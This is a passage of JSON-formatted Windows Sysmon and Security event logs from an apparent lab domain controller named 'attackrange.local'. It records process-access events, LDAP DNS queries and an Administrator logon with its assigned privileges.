2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:31.864","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2409,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:31.239\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:31.239","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"1460","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2410,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:31.239\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nProcessId: 1336\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:31.239","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"1460","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2411,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:32.880\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:32.880","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2412,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:33.895\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:33.895","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2413,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:34.176\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 908\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:34.176","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"908","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4776,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14336,"OpcodeValue":0,"RecordNumber":220270,"ProcessID":864,"ThreadID":908,"Channel":"Security","Message":"The computer attempted to validate the credentials for an account.\r\n\r\nAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\r\nLogon Account:\tAdministrator\r\nSource Workstation:\tWIN-DC-8400769\r\nError Code:\t0x0","Category":"Credential Validation","Opcode":"Info","PackageName":"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0","TargetUserName":"Administrator","Workstation":"WIN-DC-8400769","Status":"0x0","EventReceivedTime":"2020-08-01 06:49:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220271,"ProcessID":864,"ThreadID":908,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:49:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220272,"ProcessID":864,"ThreadID":908,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x449CD\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x449cd","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220273,"ProcessID":864,"ThreadID":908,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x449CD\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x449cd","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2414,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:34.192\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 908\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 